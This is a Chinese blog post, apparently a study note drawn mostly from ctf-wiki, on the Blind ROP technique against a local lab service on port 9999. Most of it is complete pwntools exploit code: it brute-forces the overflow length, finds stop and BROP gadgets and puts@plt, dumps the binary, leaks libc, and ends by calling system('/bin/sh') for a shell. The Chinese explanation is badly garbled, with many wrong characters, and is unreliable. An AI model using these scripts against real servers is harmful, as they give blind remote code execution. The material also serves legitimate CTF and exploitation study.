共计 4525 个字符,预计需要花费 12 分钟才能阅读完成。
开始欢快得学习 blindROP 之旅
emmmm,一点点地看完了,因为不怎么理解指标文件构造,有些中央不是很懂,当晓得他要做什么事件。而后发现 …. 用他人集成的货色真好,用 ida 真好
复述一下原理
判断栈溢出长度
- 暴力枚举
-
Stack Reading
- 获取栈上的数据来泄露 canaries,以及 ebp 和返回地址。在一个字节一个一个尝试 canary(这个思路适宜于 canary 不变,且程序解体后能重新启动不扭转原 canar)(目前 nginx, MySQL, Apache, OpenSSH 等服务器利用都是合乎这种个性的)
-
Blind ROP
-
找到足够多的 gadgets 来管制输入函数的参数,并且对其进行调用,比如说常见的 write 函数以及 puts 函数。具体是利用填入不同的已知地址程序来晓得所猜的地址是否为可用 gadget,另外如果想管制 rdx,能够利用 strcmp 函数, 执行 strcmp 的时候,rdx 会被设置为将要被比拟的字符串的长度
-
- probe,stop,traps(traps,traps,…)
-
-
咱们通过程序解体与否 (如果程序在 probe 处间接解体怎么判断) 能够找到不会对栈进行 pop 操作的 gadget,如
- ret
- xor eax,eax; ret
-
-
probe,trap,stop,traps
-
咱们能够通过这样的布局找到只是弹出一个栈变量的 gadget。如
- pop rax; ret
- pop rdi; ret
-
-
probe, trap, trap, trap, trap, trap, trap, stop, traps
-
咱们能够通过这样的布局来找到弹出 6 个栈变量的 gadget,也就是与 brop gadget 类似的 gadget。这里感觉原文是有问题的,比如说如果遇到了只是 pop 一个栈变量的地址,其实也是不会解体的,,这里一般来说会遇到两处比拟有意思的中央
- plt 处不会崩,,
- _start 处不会崩,相当于程序从新执行。
-
-
Build the exploit
- 利用输入函数来 dump 出程序以便于来找到更多的 gadgets,从而能够写出最初的 exploit。典型的利用 rop
而后是对应脚本
确定栈溢出长度 [¶]
def getbufferflow_length():
i = 1
while 1:
try:
sh = remote('127.0.0.1', 9999)
sh.recvuntil('WelCome my friend,Do you know password?n')
sh.send(i * 'a')
output = sh.recv()
sh.close()
if not output.startswith('No password'):
return i - 1
else:
i += 1
except EOFError:
sh.close()
return i - 1
寻找 stop gadgets[¶]
寻找过程如下
def get_stop_addr(length):
addr = 0x400000
while 1:
try:
sh = remote('127.0.0.1', 9999)
sh.recvuntil('password?n')
payload = 'a' * length + p64(addr)
sh.sendline(payload)
sh.recv()
sh.close()
print 'one success addr: 0x%x' % (addr)
return addr
except Exception:
addr += 1
sh.close()
辨认 brop gadgets
上面,咱们依据下面介绍的原理来失去对应的 brop gadgets 地址。结构如下,get_brop_gadget 是为了失去可能的 brop gadget,前面的 check_brop_gadget 是为了查看。
def get_brop_gadget(length, stop_gadget, addr):
try:
sh = remote('127.0.0.1', 9999)
sh.recvuntil('password?n')
payload = 'a' * length + p64(addr) + p64(0) * 6 + p64(stop_gadget) + p64(0) * 10
sh.sendline(payload)
content = sh.recv()
sh.close()
print content
# stop gadget returns memory
if not content.startswith('WelCome'):
return False
return True
except Exception:
sh.close()
return False
def check_brop_gadget(length, addr):
try:
sh = remote('127.0.0.1', 9999)
sh.recvuntil('password?n')
payload = 'a' * length + p64(addr) + 'a' * 8 * 10
sh.sendline(payload)
content = sh.recv()
sh.close()
return False
except Exception:
sh.close()
return True
##length = getbufferflow_length()
length = 72
##get_stop_addr(length)
stop_gadget = 0x4006b6
addr = 0x400740
while 1:
print hex(addr)
if get_brop_gadget(length, stop_gadget, addr):
print 'possible brop gadget: 0x%x' % addr
if check_brop_gadget(length, addr):
print 'success brop gadget: 0x%x' % addr
break
addr += 1确定 puts@plt 地址 [¶]
依据下面,所说咱们能够结构如下 payload 来进行获取
def get_puts_addr(length, rdi_ret, stop_gadget):
addr = 0x400000
while 1:
print hex(addr)
sh = remote('127.0.0.1', 9999)
sh.recvuntil('password?n')
payload = 'A' * length + p64(rdi_ret) + p64(0x400000) + p64(addr) + p64(stop_gadget)
sh.sendline(payload)
try:
content = sh.recv()
if content.startswith('x7fELF'):
print 'find puts@plt addr: 0x%x' % addr
return addr
sh.close()
addr += 1
except Exception:
sh.close()
addr += 1泄露 puts@got 地址 [¶]
在咱们能够调用 puts 函数后,咱们能够泄露 puts 函数的地址,进而获取 libc 版本,从而获取相干的 system 函数地址与 / bin/sh 地址,从而获取 shell。咱们从 0x400000 开始泄露 0x1000 个字节,这曾经足够蕴含程序的 plt 局部了。代码如下
def leak(length, rdi_ret, puts_plt, leak_addr, stop_gadget):
sh = remote('127.0.0.1', 9999)
payload = 'a' * length + p64(rdi_ret) + p64(leak_addr) + p64(puts_plt) + p64(stop_gadget)
sh.recvuntil('password?n')
sh.sendline(payload)
try:
data = sh.recv()
sh.close()
try:
data = data[:data.index("nWelCome")]
except Exception:
data = data
if data == "":
data = 'x00'
return data
except Exception:
sh.close()
return None
##length = getbufferflow_length()
length = 72
##stop_gadget = get_stop_addr(length)
stop_gadget = 0x4006b6
##brop_gadget = find_brop_gadget(length,stop_gadget)
brop_gadget = 0x4007ba
rdi_ret = brop_gadget + 9
##puts_plt = get_puts_plt(length, rdi_ret, stop_gadget)
puts_plt = 0x400560
addr = 0x400000
result = ""
while addr < 0x401000:
print hex(addr)
data = leak(length, rdi_ret, puts_plt, addr, stop_gadget)
if data is None:
continue
else:
result += data
addr += len(data)
with open('code', 'wb') as f:
f.write(result)
exp
length = 72
##stop_gadget = get_stop_addr(length)
stop_gadget = 0x4006b6
##brop_gadget = find_brop_gadget(length,stop_gadget)
brop_gadget = 0x4007ba
rdi_ret = brop_gadget + 9
##puts_plt = get_puts_addr(length, rdi_ret, stop_gadget)
puts_plt = 0x400560
##leakfunction(length, rdi_ret, puts_plt, stop_gadget)
puts_got = 0x601018
sh = remote('127.0.0.1', 9999)
sh.recvuntil('password?n')
payload = 'a' * length + p64(rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(stop_gadget)
sh.sendline(payload)
data = sh.recvuntil('nWelCome', drop=True)
puts_addr = u64(data.ljust(8, 'x00'))
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
payload = 'a' * length + p64(rdi_ret) + p64(binsh_addr) + p64(system_addr) + p64(stop_gadget)
sh.sendline(payload)
sh.interactive()(以上内容绝大部分来自 ctf-wiki,这里仅供本人学习记录,若有侵权,请分割我)
正文完
